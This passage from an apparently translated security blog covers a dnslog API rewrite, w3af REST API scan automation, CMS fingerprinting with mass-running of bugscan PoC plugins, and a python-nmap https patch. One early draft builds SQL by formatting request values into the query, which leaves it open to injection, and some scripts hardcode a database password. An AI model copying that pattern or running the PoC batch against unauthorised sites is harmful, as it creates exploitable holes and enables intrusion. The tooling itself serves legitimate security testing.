So it can only match the xxxx.fuck.dns5.org style; a form like fuck.dns5.org/?cmd=fuck apparently cannot be queried at all. I first wanted to rewrite the whole thing, but that's too much work, so patching dnslog's api function it is.
 # rewrite the api:
# 1. by default return all log entries
# 2. allow /api/xxxx/(dns|web)/
# 3. allow pinpointing via /api/xxxx/(dns|web)/xxxx/
Steps:
# first fetch the user id
# xxx = (select userid from logview_user where udomain = udomain)
 
then run the matching SQL depending on dns|web:
if logtype == 'dns':
        # needs: select log_time,host from logview_dnslog where userid = xxx and path like '%hashstr%'
elif logtype == 'web':
        # needs: SELECT "remote_addr","http_user_agent","log_time","path" FROM "logview_weblog" WHERE "user_id"=xxx and path like '%hashstr%'
 
Here hashstr can actually be empty. Testing against the stock database:

SELECT "log_time","remote_addr","http_user_agent","path" FROM "logview_weblog" WHERE user_id=(select id from logview_user where udomain = 'test') and path like '3%'
log_time    remote_addr http_user_agent path
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/favicon.ico

Leaving hashstr empty:

SELECT "log_time","remote_addr","http_user_agent","path" FROM "logview_weblog" WHERE user_id=(select id from logview_user where udomain = 'test') and path like '%%'

still yields:

log_time    remote_addr http_user_agent path
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/favicon.ico

so the query stays intact either way.
 
The rewritten api function, roughly:

def api(request, logtype, udomain, hashstr):
    result = ''
    # udomain must not be empty
    if len(udomain) > 0:
        if logtype == 'dns':
            sql = ("select log_time,host from logview_dnslog where userid = (select userid from logview_user "
                   "where udomain = '{udomain}') and path like '%{hash}%'").format(udomain=udomain, hash=hashstr)
        elif logtype == 'web':
            sql = ("SELECT log_time,remote_addr,http_user_agent,path FROM logview_weblog WHERE user_id=(select "
                   "id from logview_user where udomain = '{udomain}') and path like '%{hash}%'").format(udomain=udomain, hash=hashstr)
        logging.info(sql)
        # execute sql here
    return result



Honestly that first version was wishful thinking; I don't know Django and was crying my way through. And some damn unknown Chrome bug kept crashing the tab whenever I touched the arrow keys.


More or less done now; bugs can wait.

def api(request, logtype, udomain, hashstr):
    import json
    result = None
    re_result = []                # the first draft was missing this initializer
    host = "%s.%s." % (hashstr, udomain)
    if logtype == 'web':
        res = WebLog.objects.all().filter(path__contains=hashstr)
        if len(res) > 0:
            for rr in res:
                result = dict(
                    time=str(rr.log_time),
                    ipaddr=rr.remote_addr,
                    ua=rr.http_user_agent,
                    path=rr.path
                )
                re_result.append(result)

    elif logtype == 'dns':
        res = DNSLog.objects.all().filter(host__contains=host)
        if len(res) > 0:
            for rr in res:
                result = dict(
                    time=str(rr.log_time),
                    host=rr.host
                )
                re_result.append(result)

    else:
        return HttpResponseRedirect('/')
    return render(request, 'api.html', {'apistatus': json.dumps(re_result)})
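With that, a client can consume the output directly. A minimal sketch, assuming api.html is stripped down to emit nothing but the JSON payload (host and token are the ones from the example above):

import json
import requests

resp = requests.get('http://webadmin.secevery.com/api/web/www/whoami/', timeout=30)
for hit in json.loads(resp.text):
    print hit['time'], hit['ipaddr'], hit['path']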

About w3af_api

Published: November 23, 2016 // Categories: work log, dev notes, ops, linux, code study, python, misc // No Comments

Today I came across a SaaS product and chatted with its author; it turns out to be built on w3af_api, with extra check types bolted on. Seemed impressive, so I went and looked at w3af. The docs are over here.

w3af counts as an old-timer. I rarely use it myself; the results never felt as good as hoped. For one, its crawler module hasn't been updated in ages, so many links generated by dynamic scripts are not picked up accurately. Compare:

- http://testphp.acunetix.com/
- http://testphp.acunetix.com/AJAX/
- http://testphp.acunetix.com/AJAX/index.php
- http://testphp.acunetix.com/AJAX/styles.css
- http://testphp.acunetix.com/Flash/
- http://testphp.acunetix.com/Flash/add.fla
- http://testphp.acunetix.com/Flash/add.swf
- http://testphp.acunetix.com/Mod_Rewrite_Shop/
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/1.jpg
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/2.jpg
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/3.jpg
- http://testphp.acunetix.com/artists.php
- http://testphp.acunetix.com/cart.php
- http://testphp.acunetix.com/categories.php
- http://testphp.acunetix.com/disclaimer.php
- http://testphp.acunetix.com/guestbook.php
- http://testphp.acunetix.com/hpp/
- http://testphp.acunetix.com/hpp/params.php
- http://testphp.acunetix.com/images/logo.gif
- http://testphp.acunetix.com/images/remark.gif
- http://testphp.acunetix.com/index.php
- http://testphp.acunetix.com/listproducts.php
- http://testphp.acunetix.com/login.php
- http://testphp.acunetix.com/product.php
- http://testphp.acunetix.com/redir.php
- http://testphp.acunetix.com/search.php
- http://testphp.acunetix.com/secured/
- http://testphp.acunetix.com/secured/newuser.php
- http://testphp.acunetix.com/secured/style.css
- http://testphp.acunetix.com/showimage.php
- http://testphp.acunetix.com/signup.php
- http://testphp.acunetix.com/style.css
- http://testphp.acunetix.com/userinfo.php

That's what w3af crawled, versus what the crawl module I tinkered with a few days ago picked up [it fuzzes directories before crawling, so it basically covers the need].

But that's beside the point; the point is w3af_api. Its documentation is over there; a quick rundown:

1. Startup. Two options: either run it directly

$ ./w3af_api
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

or use docker:

$ cd extras/docker/scripts/
$ ./w3af_api_docker
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

2. Authentication. The password can be changed; the default digest is sha512sum.

Generate a password hash:

$ echo -n "secret" | sha512sum
bd2b1aaf7ef4f09be9f52ce2d8d599674d81aa9d6a4421696dc4d93dd0619d682ce56b4d64a9ef097761ced99e0f67265b5f76085e5b0ee7ca4696b2ad6fe2b2  -

$ ./w3af_api -p "bd2b1aaf7ef4f09be9f52ce2d8d599674d81aa9d6a4421696dc4d93dd0619d682ce56b4d64a9ef097761ced99e0f67265b5f76085e5b0ee7ca4696b2ad6fe2b2"
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

The credentials and other settings can also be put into a yml config file and loaded at startup.

3. Using the API

Start a new scan  [POST] /scans/
Check the scan status  GET /scans/0/status
Fetch the vulnerability list  GET /scans/0/kb/
Delete scan data  DELETE /scans/0/
List all scans  GET /scans/
Pause a scan  GET /scans/0/pause
Stop a scan  GET /scans/0/stop
View the scan log  GET /scans/0/log

A real-world example, kicking off one scan:

import requests
import json

data = {'scan_profile': file('../core/w3af/profiles/full_audit.pw3af').read(),
        'target_urls': ['http://testphp.acunetix.com']}

response = requests.post('http://127.0.0.1:5000/scans/',
                         data=json.dumps(data),
                         headers={'content-type': 'application/json'})
                         
print response.text
scan_profile    must contain the contents of a w3af scan profile (the file's contents, not its name)
target_urls     the list of URLs w3af should start crawling from
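Polling the scan afterwards is just more GETs against the endpoints listed above; a sketch (scan id 0 is the first scan on a fresh API instance):

import requests

status = requests.get('http://127.0.0.1:5000/scans/0/status')
print status.text

kb = requests.get('http://127.0.0.1:5000/scans/0/kb/')
print kb.text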

Checking the scan status:

Viewing the vulnerability list:

Details of a specific vulnerability:

{
  "attributes": {
    "db": "MySQL database",
    "error": "mysql_"
  },
  "cwe_ids": [
    "89"
  ],
  "cwe_urls": [
    "https://cwe.mitre.org/data/definitions/89.html"
  ],
  "desc": "SQL injection in a MySQL database was found at: \"http://testphp.acunetix.com/userinfo.php\", using HTTP method POST. The sent post-data was: \"uname=a%27b%22c%27d%22&pass=FrAmE30.\" which modifies the \"uname\" parameter.",
  "fix_effort": 50,
  "fix_guidance": "The only proven method to prevent against SQL injection attacks while still maintaining full application functionality is to use parameterized queries (also known as prepared statements). When utilising this method of querying the database, any value supplied by the client will be handled as a string value rather than part of the SQL query.\n\nAdditionally, when utilising parameterized queries, the database engine will automatically check to make sure the string being used matches that of the column. For example, the database engine will check that the user supplied input is an integer if the database column is configured to contain integers.",
  "highlight": [
    "mysql_"
  ],
  "href": "/scans/0/kb/29",
  "id": 29,
  "long_description": "Due to the requirement for dynamic content of today's web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.\n\nTo meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself. An SQL injection occurs when a value originating from the client's request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.\n\nThe successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.\n\nThis injection was detected as the tool was able to cause the server to respond to the request with a database related error.",
  "name": "SQL injection",
  "owasp_top_10_references": [
    {
      "link": "https://www.owasp.org/index.php/Top_10_2013-A1",
      "owasp_version": "2013",
      "risk_id": 1
    }
  ],
  "plugin_name": "sqli",
  "references": [
    {
      "title": "SecuriTeam",
      "url": "http://www.securiteam.com/securityreviews/5DP0N1P76E.html"
    },
    {
      "title": "Wikipedia",
      "url": "http://en.wikipedia.org/wiki/SQL_injection"
    },
    {
      "title": "OWASP",
      "url": "https://www.owasp.org/index.php/SQL_Injection"
    },
    {
      "title": "WASC",
      "url": "http://projects.webappsec.org/w/page/13246963/SQL%20Injection"
    },
    {
      "title": "W3 Schools",
      "url": "http://www.w3schools.com/sql/sql_injection.asp"
    },
    {
      "title": "UnixWiz",
      "url": "http://unixwiz.net/techtips/sql-injection.html"
    }
  ],
  "response_ids": [
    1494
  ],
  "severity": "High",
  "tags": [
    "web",
    "sql",
    "injection",
    "database",
    "error"
  ],
  "traffic_hrefs": [
    "/scans/0/traffic/1494"
  ],
  "uniq_id": "82f91e8c-759b-43b9-82cb-59ff9a38a836",
  "url": "http://testphp.acunetix.com/userinfo.php",
  "var": "uname",
  "vulndb_id": 45,
  "wasc_ids": [],
  "wasc_urls": []
}

That feels like enough: start, pause, stop and delete scans, plus pull details and fix guidance for any finding. And since everything goes through the API, a distributed setup comes naturally.

import pika
import requests
import json
import sys
import time
import sqlalchemy as db
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os

# database stuffs
Base = declarative_base()

# scan
class Scan(Base):
    __tablename__ = 'scans'
    id = db.Column(db.Integer, primary_key = True)
    relative_id = db.Column(db.Integer)
    description = db.Column(db.Text)
    target_url = db.Column(db.String(128))
    start_time = db.Column(db.Time)
    scan_time = db.Column(db.Time, nullable=True)
    profile = db.Column(db.String(32))
    status = db.Column(db.String(32))
    deleted = db.Column(db.Boolean, default=False)
    run_instance = db.Column(db.Unicode(128))
    num_vulns = db.Column(db.Integer)
    vulns = db.orm.relationship("Vulnerability", back_populates="scan")
    user_id = db.Column(db.String(40))

    def __repr__(self):
        return '<Scan %d>' % self.id

# vuln
class Vulnerability(Base):
    __tablename__ = 'vulns'
    id = db.Column(db.Integer, primary_key = True)
    relative_id = db.Column(db.Integer) # relative to scans
    stored_json = db.Column(db.Text) # inefficient, might fix later
    deleted = db.Column(db.Boolean, default=False)
    false_positive = db.Column(db.Boolean, default=False)
    scan_id = db.Column(db.Integer, db.ForeignKey('scans.id'))
    scan = db.orm.relationship("Scan", back_populates="vulns")

    def __init__(self, id, json, scan_id):
        self.relative_id = id
        self.stored_json = json
        self.scan_id = scan_id

    def __repr__(self):
        return '<Vuln %d>' % self.id

engine = db.create_engine(os.environ.get('SQLALCHEMY_CONN_STRING'))
Session = sessionmaker(bind=engine)
sess = Session()

credentials = pika.PlainCredentials(os.environ.get('TASKQUEUE_USER'), os.environ.get('TASKQUEUE_PASS'))
con = pika.BlockingConnection(pika.ConnectionParameters(host=os.environ.get('TASKQUEUE_HOST'),credentials=credentials))

channelTask = con.channel()
channelTask.queue_declare(queue='task', durable=True)

channelResult = con.channel()
channelResult.queue_declare(queue='result')

# URL to w3af REST API interface instance
server = sys.argv[1]

vul_cnt = 0

def freeServer(sv, href):
    r = requests.delete(sv + href)
    print r.text

def isFree(sv):
    r = requests.get(sv + '/scans/')
    print r.text
    items = json.loads(r.text)['items']
    if len(items) == 0:
        return True
    # number of items > 0
    item = items[0]
    if item['status'] == 'Stopped':
        freeServer(sv, item['href'])
        return True
    return False

def sendTaskDone(server, href):
    data = {}
    data['server'] = server
    data['href'] = href
    message = json.dumps(data)
    channelResult.basic_publish(exchange='',
                        routing_key='result',
                        body=message)

def scann(target):
    data = {'scan_profile': file('../core/w3af/profiles/full_audit.pw3af').read(),
        'target_urls': [target]}
    response = requests.post(server + '/scans/',
                        data=json.dumps(data),
                        headers={'content-type': 'application/json'})

    print response.status_code
    print response.text   # requests has no .data attribute
    print response.headers

def getVul(sv, href):
    r = requests.get(sv + href)
    #db.insert(r.text)

def getVulsList(sv, href):
    global vul_cnt
    r = requests.get(sv + href + 'kb')
    vuls = json.loads(r.text)['items']
    l = len(vuls)
    if l > vul_cnt:
        for vul in vuls:
            if vul['id'] >= vul_cnt:
                getVul(sv, vul['href'])
    vul_cnt = l
        
# on receiving message
def callback(ch, method, properties, body):
    print('Get message %s', body)
    task = json.loads(body)
    scann(task['target'])
    task_done = False
    time.sleep(1)
    step = 0
    last_vuln_len = 0
    sv = server
    scan = sess.query(Scan).filter_by(id=task['scan_id']).first()
    # tell gateway server that the task is loaded on this instance
    scan.run_instance = server
    while True:
        # update scan status; check if freed
        list_scans = json.loads(requests.get(sv + '/scans/').text)['items'] # currently just 1
        if (len(list_scans) == 0): # freed
            break
        currentpath = list_scans[0]['href']
        # update vuln list
        r = requests.get(sv + currentpath + '/kb/')
        items = json.loads(r.text)['items'] 
        for i in xrange(last_vuln_len, len(items)):
            v = Vulnerability(i+1, requests.get(sv + items[i]['href']).text, task['scan_id'])
            sess.add(v)
            sess.commit()
            scan.num_vulns += 1
        last_vuln_len = len(items)
        scan.status = list_scans[0]['status']
        sess.commit()
        if scan.status == 'Stopped' and not task_done:
            task_done = True
            requests.delete(sv + currentpath)
        step += 1
        if step == 9:
            con.process_data_events() # MQ heartbeat
            step = 0
        time.sleep(5) # avoid over consumption
    # TODO: send mails to list when the scan is stopped or completed
    print 'Done'
    ch.basic_ack(delivery_tag=method.delivery_tag)
#print getServerStatus(server)


channelTask.basic_qos(prefetch_count=1)
channelTask.basic_consume(callback, queue='task')

print '[*] Waiting for message'

channelTask.start_consuming()
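The other side of the queue just publishes JSON tasks; a sketch of feeding this worker one target (field names match what callback() reads; the MQ credentials are placeholders):

import json
import pika

credentials = pika.PlainCredentials('guest', 'guest')
con = pika.BlockingConnection(pika.ConnectionParameters(host='127.0.0.1', credentials=credentials))
ch = con.channel()
ch.queue_declare(queue='task', durable=True)
ch.basic_publish(exchange='', routing_key='task',
                 body=json.dumps({'target': 'http://testphp.acunetix.com', 'scan_id': 1}))
con.close()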

 

Online CMS identification and invoking bugscan plugins

Published: October 23, 2016 // Categories: dev notes, linux, python, windows // No Comments

I figured rolling my own would fit my needs best, but it would be far too time-consuming and the coverage probably wouldn't be broad.

Then I stumbled on http://whatweb.bugscaner.com/ and its coverage turned out decent; the common CMSes are all in there. A few tests put the false positives within an acceptable range, so let's automate it. A simple demo follows. One shortcoming: it only takes http targets, not https; the site strips http|https:// from submissions.

#!/usr/bin/python
import re
import json
import requests



def whatcms(url):
    headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
        "Referer":"http://whatweb.bugscaner.com/look/",
        }
    """
    try:
        res = requests.get('http://whatweb.bugscaner.com/look/',timeout=60, verify=False)
        if res.status_code==200:
            hashes = re.findall(r'value="(.*?)" name="hash" id="hash"',res.content)[0]
    except Exception as e:
        print str(e)
        return False
    """
    data = "url=%s&hash=0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479"%(url)
    try:
        respone = requests.post("http://whatweb.bugscaner.com/what/",data=data,headers=headers,timeout=60, verify=False)
        if int(respone.status_code)==200:
            result = json.loads(respone.content)
            if len(result["cms"])>0:
                return result["cms"]
            else:
                return "www"
    except Exception as e:
        print str(e)
        return "www"
        
if __name__ == '__main__':
    import sys
    url = sys.argv[1]
    print whatcms(url)

Whatever can't be identified is treated as www. With that settled, time to wire up the plugins. The plan: classify first by reading the service each plugin script checks for, then store filename and service in a database for later lookup. A small script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re,os,glob,time
from mysql_class import MySQL
"""
logging.basicConfig(
    level=logging.DEBUG,
    format="[%(asctime)s] %(levelname)s: %(message)s")
"""
"""
1. identify the specific cms
2. look the cms up in the database -- fall back to iterating over everything if nothing matches
3. output the results
"""
def timestamp():
    return str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))

"""
DROP TABLE IF EXISTS `bugscan`;
CREATE TABLE `bugscan` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `service` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `filename` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `time` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
SET FOREIGN_KEY_CHECKS = 1;
"""
dbconfig = {'host':'127.0.0.1','port': 3306,'user':'root','passwd':'root123','db':'proscan','charset':'utf8'}
db = MySQL(dbconfig)

def insert(filename):
    file_data = open(filename,'rb').read()
    service = re.findall(r"if service.*==(.*?):",file_data)
    if len(service)>0:
        servi = service[0].replace("'", "").replace("\"", "").replace(" ", "")
        
        sqlInsert = "insert into `bugscan`(id,service,filename,time) values ('','%s','%s','%s');" % (str(servi),str(filename.replace('./bugscannew/','')),str(timestamp()))
        print sqlInsert
        #db.query(sql=sqlInsert)

for filename in glob.glob(r'./bugscannew/*.py'):
    insert(filename)

Next question: how to invoke a specific plugin. I chewed on this for quite a while, until I recently found time to read pocscan, which has a neat trick: append the plugin directory to the Python path, then from xxx import audit, and the problem solves itself.

def import_poc(pyfile,url):
    poc_path = os.getcwd()+"/bugscannew/"
    path = poc_path + pyfile + ".py"
    filename = path.split("/")[-1].split(".py")[0]
    sys.path.append(poc_path)
    poc0 = imp.load_source('audit', path)
    audit_function = poc0.audit
    from dummy import *
    audit_function.func_globals.update(locals())
    ret = audit_function(url)
    if ret is not None and 'None' not in ret:
        #print ret
        return ret

No perfectly clean invocation yet; here's a rough demo:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re,os
import imp,sys
import time,json
import logging,glob
import requests
from mysql_class import MySQL
"""
logging.basicConfig(
    level=logging.DEBUG,
    format="[%(asctime)s] %(levelname)s: %(message)s")
"""
"""
1. identify the specific cms
2. look the cms up in the database -- fall back to iterating over everything if nothing matches
3. output the results
"""
def timestamp():
    return str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))

"""
DROP TABLE IF EXISTS `bugscan`;
CREATE TABLE `bugscan` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `service` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `filename` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `time` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
SET FOREIGN_KEY_CHECKS = 1;
"""
dbconfig = {'host':'127.0.0.1','port': 3306,'user':'root','passwd':'root123','db':'proscan','charset':'utf8'}
db = MySQL(dbconfig)

def insert(filename):
    file_data = open(filename,'rb').read()
    service = re.findall(r"if service.*==(.*?):",file_data)
    if len(service)>0:
        servi = service[0].replace("'", "").replace("\"", "").replace(" ", "")
        
        sqlInsert = "insert into `bugscan`(id,service,filename,time) values ('','%s','%s','%s');" % (str(servi),str(filename.replace('./bugscannew/','')),str(timestamp()))
        print sqlInsert
        #db.query(sql=sqlInsert)
        #print servi,filename

def check(service,url):
    if service == 'www':
        sqlsearch = "select  filename from  `bugscan` where service = '%s'" %(service)
    elif service != 'www':
        sqlsearch = "select  filename from  `bugscan` where service = 'www' or service = '%s'" %(service)
    print sqlsearch 
    if int(db.query(sql=sqlsearch))>0:
        result = db.fetchAllRows()
        for row in result:
            #return result
            for colum in row:
                colum = colum.replace(".py","")
                import_poc(colum,url)

def import_poc(pyfile,url):
    poc_path = os.getcwd()+"/bugscannew/"
    path = poc_path + pyfile + ".py"
    filename = path.split("/")[-1].split(".py")[0]
    sys.path.append(poc_path)
    poc0 = imp.load_source('audit', path)
    audit_function = poc0.audit
    from dummy import *
    audit_function.func_globals.update(locals())
    ret = audit_function(url)
    if ret is not None and 'None' not in ret:
        #print ret
        return ret

def whatcms(url):
    headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
        "Referer":"http://whatweb.bugscaner.com/look/",
        }
    """
    try:
        res = requests.get('http://whatweb.bugscaner.com/look/',timeout=60, verify=False)
        if res.status_code==200:
            hashes = re.findall(r'value="(.*?)" name="hash" id="hash"',res.content)[0]
    except Exception as e:
        print str(e)
        return False
    """
    data = "url=%s&hash=0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479"%(url)
    try:
        respone = requests.post("http://whatweb.bugscaner.com/what/",data=data,headers=headers,timeout=60, verify=False)
        if int(respone.status_code)==200:
            result = json.loads(respone.content)
            if len(result["cms"])>0:
                return result["cms"]
            else:
                return "www"
    except Exception as e:
        print str(e)
        return "www"
        
if __name__ == '__main__':
    #for filename in glob.glob(r'./bugscannew/*.py'):
    #   insert(filename)
    url = "http://0day5.com/"
    print check(whatcms(url),url)

There are still gaps: the invocation could use multithreading for speed, and if the CMS can't be identified the result is bound to be inaccurate, while loading every plugin for a full fuzz takes far too long.

Then I got my hands on 琦神's demo, which is more brute force: load everything and fuzz the lot once.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# papapa.py
import re
import socket
import sys
import os
import urlparse
import time
from dummy.common import *
import util
from dummy import *
import miniCurl  # bugscan's curl wrapper; assumed to sit alongside the plugins
import importlib
import threading
import Queue as que


class Worker(threading.Thread):  # worker thread: pulls tasks off the queue and runs them
    def __init__(self, workQueue, resultQueue, **kwds):
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(True)
        self.workQueue = workQueue
        self.resultQueue = resultQueue

    def run(self):
        while 1:
            try:
                callable, args, kwds = self.workQueue.get(False)  # get task
                res = callable(*args, **kwds)
                self.resultQueue.put(res)  # put result
            except que.Empty:
                break


class WorkManager:  # thread pool: creates and manages workers
    def __init__(self, num_of_workers=10):
        self.workQueue = que.Queue()  # task queue
        self.resultQueue = que.Queue()  # result queue
        self.workers = []
        self._recruitThreads(num_of_workers)

    def _recruitThreads(self, num_of_workers):
        for i in range(num_of_workers):
            worker = Worker(self.workQueue, self.resultQueue)  # spawn a worker thread
            self.workers.append(worker)  # add it to the pool

    def start(self):
        for w in self.workers:
            w.start()

    def wait_for_complete(self):
        while len(self.workers):
            worker = self.workers.pop()  # take a thread out of the pool and wait on it
            worker.join()
            if worker.isAlive() and not self.workQueue.empty():
                self.workers.append(worker)  # put it back into the pool
        #logging.info('All jobs were complete.')

    def add_job(self, callable, *args, **kwds):
        self.workQueue.put((callable, args, kwds))  # push a task onto the work queue

    def get_result(self, *args, **kwds):
        return self.resultQueue.get(*args, **kwds)
"""
lst=os.listdir(os.getcwd())
pocList =(','.join(c.strip('.py') for c in lst if os.path.isfile(c) and c.endswith('.py'))).split(',')
for line in pocList:
    try:
        #print line
        xxoo = importlib.import_module(line)
        xxoo.curl = miniCurl.Curl()
        xxoo.security_hole = security_hole
        xxoo.task_push = task_push
        xxoo.util =util
        xxoo.security_warning = security_warning
        xxoo.security_note = security_note
        xxoo.security_info = security_info
        xxoo.time = time
        xxoo.audit('http://0day5.com')
    except Exception as e:
        print line,e
"""

def bugscan(line,url):
    #print line,url
    try:
        xxoo = importlib.import_module(line)
        xxoo.curl = miniCurl.Curl()
        xxoo.security_hole = security_hole
        xxoo.task_push = task_push
        xxoo.util =util
        xxoo.security_warning = security_warning
        xxoo.security_note = security_note
        xxoo.security_info = security_info
        xxoo.time = time
        xxoo.audit(url)
    except Exception as e:
        #print line,e
        pass

def main(url):
    wm = WorkManager(20)
    lst=os.listdir(os.getcwd())
    pocList = [c[:-3] for c in lst if os.path.isfile(c) and c.endswith('.py')]  # slice off '.py'; strip('.py') would also eat leading/trailing p/y characters
    for line in pocList:
        if 'apa' not in line:  # skip this script itself (papapa.py)
            wm.add_job(bugscan, line, url)
    wm.start()
    wm.wait_for_complete()
start = time.time()
main('http://0day5.com/')
print time.time()-start

Accuracy is worrying; for reference only.

A pitfall with python-nmap not reporting https

Published: September 1, 2016 // Categories: work log, ops, dev notes, linux, windows, python, misc // No Comments

Today, while using python-nmap to scan and store results, I noticed https ports being flatly classified as http.

Several careful retries gave the same answer. Not willing to let it go, I looked hard at the scan arguments and found that python-nmap forcibly appends -oX - when invoking nmap.

A normal scan would be:

nmap 45.33.49.119 -p T:443 -Pn -sV --script=banner

but after python-nmap it becomes:

nmap -oX - 45.33.49.119 -p T:443 -Pn -sV --script=banner
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/local/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.12 scan initiated Thu Sep  1 00:02:07 2016 as: nmap -oX - -p T:443 -Pn -sV -&#45;script=banner 45.33.49.119 -->
<nmaprun scanner="nmap" args="nmap -oX - -p T:443 -Pn -sV -&#45;script=banner 45.33.49.119" start="1472659327" startstr="Thu Sep  1 00:02:07 2016" version="7.12" xmloutputversion="1.04">
<scaninfo type="connect" protocol="tcp" numservices="1" services="443"/>
<verbose level="0"/>
<debugging level="0"/>
<host starttime="1472659328" endtime="1472659364"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="45.33.49.119" addrtype="ipv4"/>
<hostnames>
<hostname name="ack.nmap.org" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="443"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.6" extrainfo="(CentOS)" tunnel="ssl" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.6</cpe></service><script id="http-server-header" output="Apache/2.4.6 (CentOS)"><elem>Apache/2.4.6 (CentOS)</elem>
</script></port>
</ports>
<times srtt="191238" rttvar="191238" to="956190"/>
</host>
<runstats><finished time="1472659364" timestr="Thu Sep  1 00:02:44 2016" elapsed="36.65" summary="Nmap done at Thu Sep  1 00:02:44 2016; 1 IP address (1 host up) scanned in 36.65 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

After formatting, the interesting part of the output is:

the tunnel attribute on the service element. But reading https://bitbucket.org/xael/python-nmap/raw/8ed37a2ac20d6ef26ead60d36f739f4679fcdc3e/nmap/nmap.py, nothing ever picks it up:

for dport in dhost.findall('ports/port'):
                # protocol
                proto = dport.get('protocol')
                # port number converted as integer
                port =  int(dport.get('portid'))
                # state of the port
                state = dport.find('state').get('state')
                # reason
                reason = dport.find('state').get('reason')
                # name, product, version, extra info and conf if any
                name = product = version = extrainfo = conf = cpe = ''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'cpe': cpe}

The obvious fix: pull tunnel out alongside name and match on both. So, patching lines 410-440:

                name = product = version = extrainfo = conf = cpe = tunnel =''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')
                    if dname.get('tunnel'):
                        tunnel = dname.get('tunnel')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'tunnel':tunnel,
                                                          'cpe': cpe}

Also add the new tunnel field to the CSV header at lines 654-670:

        csv_ouput = csv.writer(fd, delimiter=';')
        csv_header = [
            'host',
            'hostname',
            'hostname_type',
            'protocol',
            'port',
            'name',
            'state',
            'product',
            'extrainfo',
            'reason',
            'version',
            'conf',
            'tunnel',
            'cpe'
            ]

Then import the patched file and post-process the scan results: when name is http and tunnel is ssl at the same time, the service is really https:

        for targetHost in scanner.all_hosts():
            if scanner[targetHost].state() == 'up' and scanner[targetHost]['tcp']:
                for targetport in scanner[targetHost]['tcp']:
                    result = scanner[targetHost]['tcp'][int(targetport)]
                    #print(result)
                    if result['state'] == 'open' and result['product'] != 'tcpwrapped':
